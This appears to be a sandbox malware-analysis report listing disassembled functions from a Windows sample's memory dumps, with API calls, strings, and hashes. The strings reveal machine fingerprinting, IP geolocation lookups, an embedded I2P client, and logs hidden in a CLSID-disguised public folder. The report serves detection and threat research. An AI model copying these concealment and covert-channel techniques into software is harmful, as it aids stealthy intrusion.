String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: a19611df617a611f040681802e7fcf2e2ba08df4a7e16da449a0efe9d34672f6
Instruction ID: 50199b991adbe07a5e032486247b5f2f8deecd754d1cdf21f6b95f35aab1c30e
Opcode Fuzzy Hash: a19611df617a611f040681802e7fcf2e2ba08df4a7e16da449a0efe9d34672f6
Instruction Fuzzy Hash: E0D17E6BF1EA53C1FB629715E5703B92290AF617F8F544036D94D17392DE2CEC84838A

Function 00007FF70CAD28FC Relevance: 52.8, APIs: 10, Strings: 20, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF70CAD2304: LoadLibraryA.KERNEL32(?,?,service,0000021B15D113D0,00007FF70CAD2910), ref: 00007FF70CAD2312

Part of subcall function 00007FF70CAD2283: GetProcAddress.KERNEL32(?,?,00000000,0000021B15D113D0,?,00007FF70CAD292B), ref: 00007FF70CAD22A3

FreeLibrary.KERNEL32 ref: 00007FF70CAD298F
GetNativeSystemInfo.KERNEL32 ref: 00007FF70CAD29DB
GetWindowsDirectoryA.KERNEL32 ref: 00007FF70CAD29F4
GetLastError.KERNEL32 ref: 00007FF70CAD2A02

Strings

RtlGetVersion, xrefs: 00007FF70CAD291C
ntdll.dll, xrefs: 00007FF70CAD2904
sys_init, xrefs: 00007FF70CAD296D, 00007FF70CAD29A2, 00007FF70CAD2A0D, 00007FF70CAD2AEE, 00007FF70CAD2BC0, 00007FF70CAD2BFE, 00007FF70CAD2CB1, 00007FF70CAD2D47, 00007FF70CAD2E20
\, xrefs: 00007FF70CAD2B60
MachineGuid, xrefs: 00007FF70CAD2B23
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FF70CAD2B1C, 00007FF70CAD2BF0
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF70CAD29A9
:, xrefs: 00007FF70CAD2B5B
service, xrefs: 00007FF70CAD28FF
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FF70CAD2CB8
%, xrefs: 00007FF70CAD2B09
C:\Windows, xrefs: 00007FF70CAD29ED, 00007FF70CAD2AE0
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FF70CAD2974
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FF70CAD2A14
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FF70CAD2C05
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FF70CAD2D4E
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FF70CAD2E27
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FF70CAD2AF5
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FF70CAD2BC7
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FF70CAD2B2A

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: %$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$service$sys_init
API String ID: 3828489143-3798070276
Opcode ID: 089b3f22f819f16d5633868e0f01b039814ac1a410c15203a5f55c940dbc9cdb
Instruction ID: 17208354fa761fdc0c57ed97fa26cd1fd2eed093933399c79e390d799b98b119
Opcode Fuzzy Hash: 089b3f22f819f16d5633868e0f01b039814ac1a410c15203a5f55c940dbc9cdb
Instruction Fuzzy Hash: 0CD188E1E0C65781FA20BB54FC40BB8E660AF40759FD51232C98F176A8DF6DAD84D3A1

Function 00007FFDAC12BC77 Relevance: 39.4, APIs: 8, Strings: 18, Instructions: 376
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SYSTEM\CurrentControlSet\Services\UpdateService\Parameters, xrefs: 00007FFDAC12BED9
--TSCB--, xrefs: 00007FFDAC12C241
Referer, xrefs: 00007FFDAC12BED2
/line?fields=query, xrefs: 00007FFDAC12BF89
-ILCCNC-, xrefs: 00007FFDAC12BC89
AKAK, xrefs: 00007FFDAC12BD08
TPCR, xrefs: 00007FFDAC12BD0F
-VRSCNC-, xrefs: 00007FFDAC12C231
KCIT, xrefs: 00007FFDAC12BCA3
-ILCCNC-, xrefs: 00007FFDAC12BDD7
mem_alloc, xrefs: 00007FFDAC12C30C
, xrefs: 00007FFDAC12C1BC
AKAK, xrefs: 00007FFDAC12C1C7
ip-api.com, xrefs: 00007FFDAC12BF96
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDAC12C313
last-patch, xrefs: 00007FFDAC12BEAC
-ILCCNC-, xrefs: 00007FFDAC12C1D2
curl/8.4.0, xrefs: 00007FFDAC12BF9D

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID:
String ID: $--TSCB--$-ILCCNC-$-ILCCNC-$-ILCCNC-$-VRSCNC-$/line?fields=query$AKAK$AKAK$KCIT$Referer$SYSTEM\CurrentControlSet\Services\UpdateService\Parameters$TPCR$[E] (%s) -> Memory allocation failed(size=%llu)$curl/8.4.0$ip-api.com$last-patch$mem_alloc
API String ID: 0-4235120829
Opcode ID: ea766b0194d0735c9a06e82f94f96268db425a52bb65e6141467e31f6e78e82a
Instruction ID: f73ccab974bafc5c9beab7d22869ad2c0e8431e2d7dfdd56ee6583767d60b3d6
Opcode Fuzzy Hash: ea766b0194d0735c9a06e82f94f96268db425a52bb65e6141467e31f6e78e82a
Instruction Fuzzy Hash: E312916BB0AB8281F6629B15E4A03B963A0FB447F4F504236DA5D477D6DF3CE401C70A

Function 00007FFDAC12A670 Relevance: 37.7, APIs: 9, Strings: 16, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDAC127734: LoadLibraryA.KERNEL32 ref: 00007FFDAC127742

Part of subcall function 00007FFDAC127400: GetModuleHandleExA.KERNEL32 ref: 00007FFDAC12741E

strlen.MSVCRT ref: 00007FFDAC12A7C8
strlen.MSVCRT ref: 00007FFDAC12A7E4
strcat.MSVCRT ref: 00007FFDAC12A800
strlen.MSVCRT ref: 00007FFDAC12A808
strcat.MSVCRT ref: 00007FFDAC12A82F
strlen.MSVCRT ref: 00007FFDAC12A837
strcat.MSVCRT ref: 00007FFDAC12A855
strlen.MSVCRT ref: 00007FFDAC12A85D
strlen.MSVCRT ref: 00007FFDAC12A877

Strings

--conf=, xrefs: 00007FFDAC12A67A
i2p_init, xrefs: 00007FFDAC12A945, 00007FFDAC12A96B
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC12A972
i2p.conf, xrefs: 00007FFDAC12A810
Done, xrefs: 00007FFDAC12A93E
C_StartI2P, xrefs: 00007FFDAC12A907
--reseed, xrefs: 00007FFDAC12A6E9
i2p.su3, xrefs: 00007FFDAC12A899
i2p, xrefs: 00007FFDAC12A83C
i2p.su3, xrefs: 00007FFDAC12A862
.file=, xrefs: 00007FFDAC12A6F3
C_InitI2P, xrefs: 00007FFDAC12A8E8
[I] (%s) -> %s, xrefs: 00007FFDAC12A94C
--datadi, xrefs: 00007FFDAC12A6B4
libi2p.dll, xrefs: 00007FFDAC12A762
i2p, xrefs: 00007FFDAC12A92E

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: strlen$strcat$HandleLibraryLoadModule
String ID: --conf=$--datadi$--reseed$.file=$C_InitI2P$C_StartI2P$Done$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$i2p$i2p$i2p.conf$i2p.su3$i2p.su3$i2p_init$libi2p.dll
API String ID: 1893813203-492052463
Opcode ID: 281965a8cca0299f78d8a16ea7cf8d59cb056eb3e7200e21da36b81dc5a84790
Instruction ID: e97f43f785e6c43bca882cdb116e93ddbe9eb3048a55e2cee952760121775e26
Opcode Fuzzy Hash: 281965a8cca0299f78d8a16ea7cf8d59cb056eb3e7200e21da36b81dc5a84790
Instruction Fuzzy Hash: 3271AE37B0EB8281FB629B05E4A03EA6291EB847D4F440031DA8D1B79BEF7CE515C744

Function 00007FFDA55AC9FC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA55ACA1C
GetLastError.KERNEL32 ref: 00007FFDA55ACB50

Part of subcall function 00007FFDA55AB930: GetModuleHandleExA.KERNEL32 ref: 00007FFDA55AB94E

strlen.MSVCRT ref: 00007FFDA55ACA6E
strlen.MSVCRT ref: 00007FFDA55ACA8A
strcat.MSVCRT ref: 00007FFDA55ACAA5
strlen.MSVCRT ref: 00007FFDA55ACAAD
strlen.MSVCRT ref: 00007FFDA55ACAC2
fopen.MSVCRT ref: 00007FFDA55ACAE8

Strings

rdpctl.l, xrefs: 00007FFDA55ACACA
Done, xrefs: 00007FFDA55ACC8D
P, xrefs: 00007FFDA55ACBDA
debug_init, xrefs: 00007FFDA55ACB0E, 00007FFDA55ACB33, 00007FFDA55ACB5B, 00007FFDA55ACC20, 00007FFDA55ACC94
log, xrefs: 00007FFDA55ACAD7
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFDA55ACB62
, xrefs: 00007FFDA55ACB6E
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFDA55ACB15
~, xrefs: 00007FFDA55ACBD5
[I] (%s) -> %s, xrefs: 00007FFDA55ACC9B
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFDA55ACC27
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55ACB3A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFDA55ACA4E, 00007FFDA55ACA64, 00007FFDA55ACA9B, 00007FFDA55ACAB8, 00007FFDA55ACB07

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
API String ID: 3395718042-1794035234
Opcode ID: 88fdb2c0a27574724d13a40fae328aa821ff84609621954b912e3e513a2910a1
Instruction ID: 2ee25a97101468f5d2a8e66d88773a112b29faf5769452fe3b70177d157d8580
Opcode Fuzzy Hash: 88fdb2c0a27574724d13a40fae328aa821ff84609621954b912e3e513a2910a1
Instruction Fuzzy Hash: FE517468F0E60F85FB125F50E8B83B91290AF07F44F815432D60E463E3EE6EA945834D

Function 00007FFDA55D9F6C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA55D9F8C
GetLastError.KERNEL32 ref: 00007FFDA55DA0C0

Part of subcall function 00007FFDA55D4AC0: GetModuleHandleExA.KERNEL32 ref: 00007FFDA55D4ADE

strlen.MSVCRT ref: 00007FFDA55D9FDE
strlen.MSVCRT ref: 00007FFDA55D9FFA
strcat.MSVCRT ref: 00007FFDA55DA015
strlen.MSVCRT ref: 00007FFDA55DA01D
strlen.MSVCRT ref: 00007FFDA55DA032
fopen.MSVCRT ref: 00007FFDA55DA058

Strings

~, xrefs: 00007FFDA55DA145
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFDA55DA085
log, xrefs: 00007FFDA55DA047
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFDA55DA0D2
Done, xrefs: 00007FFDA55DA1FD
[I] (%s) -> %s, xrefs: 00007FFDA55DA20B
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFDA55D9FBE, 00007FFDA55D9FD4, 00007FFDA55DA00B, 00007FFDA55DA028, 00007FFDA55DA077
P, xrefs: 00007FFDA55DA14A
, xrefs: 00007FFDA55DA0DE
prgmgr.l, xrefs: 00007FFDA55DA03A
debug_init, xrefs: 00007FFDA55DA07E, 00007FFDA55DA0A3, 00007FFDA55DA0CB, 00007FFDA55DA190, 00007FFDA55DA204
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55DA0AA
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFDA55DA197

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
API String ID: 3395718042-2735303109
Opcode ID: 2b34912e1a9934fbd2b939a990e0fc4d54a93500ffd10429cb98db274252f84d
Instruction ID: 0a9d6ea1f204e6a59c7b55a19327f1b4eb3a0a8a6642ff9eab131f0c351420df
Opcode Fuzzy Hash: 2b34912e1a9934fbd2b939a990e0fc4d54a93500ffd10429cb98db274252f84d
Instruction Fuzzy Hash: 3251FA6BB1E68BC1FA23DF50E8A03B91251AB47F84F940032C90D463A3DE6DF9568349

Function 00007FFDAC0F14FC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDAC0F151C
GetLastError.KERNEL32 ref: 00007FFDAC0F1650

Part of subcall function 00007FFDAC0F3A80: GetModuleHandleExA.KERNEL32 ref: 00007FFDAC0F3A9E

strlen.MSVCRT ref: 00007FFDAC0F156E
strlen.MSVCRT ref: 00007FFDAC0F158A
strcat.MSVCRT ref: 00007FFDAC0F15A5
strlen.MSVCRT ref: 00007FFDAC0F15AD
strlen.MSVCRT ref: 00007FFDAC0F15C2
fopen.MSVCRT ref: 00007FFDAC0F15E8

Strings

log, xrefs: 00007FFDAC0F15D7
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFDAC0F1615
dwlmgr.l, xrefs: 00007FFDAC0F15CA
P, xrefs: 00007FFDAC0F16DA
debug_init, xrefs: 00007FFDAC0F160E, 00007FFDAC0F1633, 00007FFDAC0F165B, 00007FFDAC0F1720, 00007FFDAC0F1794
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFDAC0F1662
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFDAC0F154E, 00007FFDAC0F1564, 00007FFDAC0F159B, 00007FFDAC0F15B8, 00007FFDAC0F1607
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC0F163A
[I] (%s) -> %s, xrefs: 00007FFDAC0F179B
~, xrefs: 00007FFDAC0F16D5
, xrefs: 00007FFDAC0F166E
Done, xrefs: 00007FFDAC0F178D
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFDAC0F1727

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
API String ID: 3395718042-2859552336
Opcode ID: ca29e854a188975124b211bdff223b2d995ccf5de1fb749ea05665b3032efd6b
Instruction ID: 24f86947d440515c6b527128680cfe5f7ab1213e582a20e56252f991a1f4c905
Opcode Fuzzy Hash: ca29e854a188975124b211bdff223b2d995ccf5de1fb749ea05665b3032efd6b
Instruction Fuzzy Hash: 30515D11F0F75781FA219711E8B03B81259AF657E4F980032C90E063ABDF6CE995E38D

Function 00007FFDA557427C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA557429C
GetLastError.KERNEL32 ref: 00007FFDA55743D0

Part of subcall function 00007FFDA5572700: GetModuleHandleExA.KERNEL32 ref: 00007FFDA557271E

strlen.MSVCRT ref: 00007FFDA55742EE
strlen.MSVCRT ref: 00007FFDA557430A
strcat.MSVCRT ref: 00007FFDA5574325
strlen.MSVCRT ref: 00007FFDA557432D
strlen.MSVCRT ref: 00007FFDA5574342
fopen.MSVCRT ref: 00007FFDA5574368

Strings

samctl.l, xrefs: 00007FFDA557434A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFDA55742CE, 00007FFDA55742E4, 00007FFDA557431B, 00007FFDA5574338, 00007FFDA5574387
P, xrefs: 00007FFDA557445A
~, xrefs: 00007FFDA5574455
, xrefs: 00007FFDA55743EE
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFDA5574395
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFDA55744A7
Done, xrefs: 00007FFDA557450D
debug_init, xrefs: 00007FFDA557438E, 00007FFDA55743B3, 00007FFDA55743DB, 00007FFDA55744A0, 00007FFDA5574514
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55743BA
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFDA55743E2
[I] (%s) -> %s, xrefs: 00007FFDA557451B
log, xrefs: 00007FFDA5574357

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
API String ID: 3395718042-1297835036
Opcode ID: dc9f842f7eac54993559c7b75295ba2506c030adb8052bc419dc14b215eb191e
Instruction ID: c755d2c38d65b6664d4ca67e54b667117767740855da776f1197d8dfd001e252
Opcode Fuzzy Hash: dc9f842f7eac54993559c7b75295ba2506c030adb8052bc419dc14b215eb191e
Instruction Fuzzy Hash: 3E516E1CB1E60FD5FA225F10A8B03B81291AF53F44FD40876D90E567A3DF6CB885A709

Function 00007FFDA5BA221C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFDA5BA223C
GetLastError.KERNEL32 ref: 00007FFDA5BA2370

Part of subcall function 00007FFDA5BA4E20: GetModuleHandleExA.KERNEL32 ref: 00007FFDA5BA4E3E

strlen.MSVCRT ref: 00007FFDA5BA228E
strlen.MSVCRT ref: 00007FFDA5BA22AA
strcat.MSVCRT ref: 00007FFDA5BA22C5
strlen.MSVCRT ref: 00007FFDA5BA22CD
strlen.MSVCRT ref: 00007FFDA5BA22E2
fopen.MSVCRT ref: 00007FFDA5BA2308

Strings

debug_init, xrefs: 00007FFDA5BA232E, 00007FFDA5BA2353, 00007FFDA5BA237B, 00007FFDA5BA2440, 00007FFDA5BA24B4
log, xrefs: 00007FFDA5BA22F7
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFDA5BA2447
, xrefs: 00007FFDA5BA238E
~, xrefs: 00007FFDA5BA23F5
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFDA5BA2335
P, xrefs: 00007FFDA5BA23FA
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA5BA235A
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFDA5BA2382
evtsrv.l, xrefs: 00007FFDA5BA22EA
Done, xrefs: 00007FFDA5BA24AD
[I] (%s) -> %s, xrefs: 00007FFDA5BA24BB
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log, xrefs: 00007FFDA5BA226E, 00007FFDA5BA2284, 00007FFDA5BA22BB, 00007FFDA5BA22D8, 00007FFDA5BA2327

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
API String ID: 3395718042-190452282
Opcode ID: c15513de3634a196f3366f7d1138319d101bf8746a27b5df0d8da0fc0013f9cf
Instruction ID: 46e93801eb440d605d715e651c62cc38935eedeb604ed84f5a8ea86696dc9edf
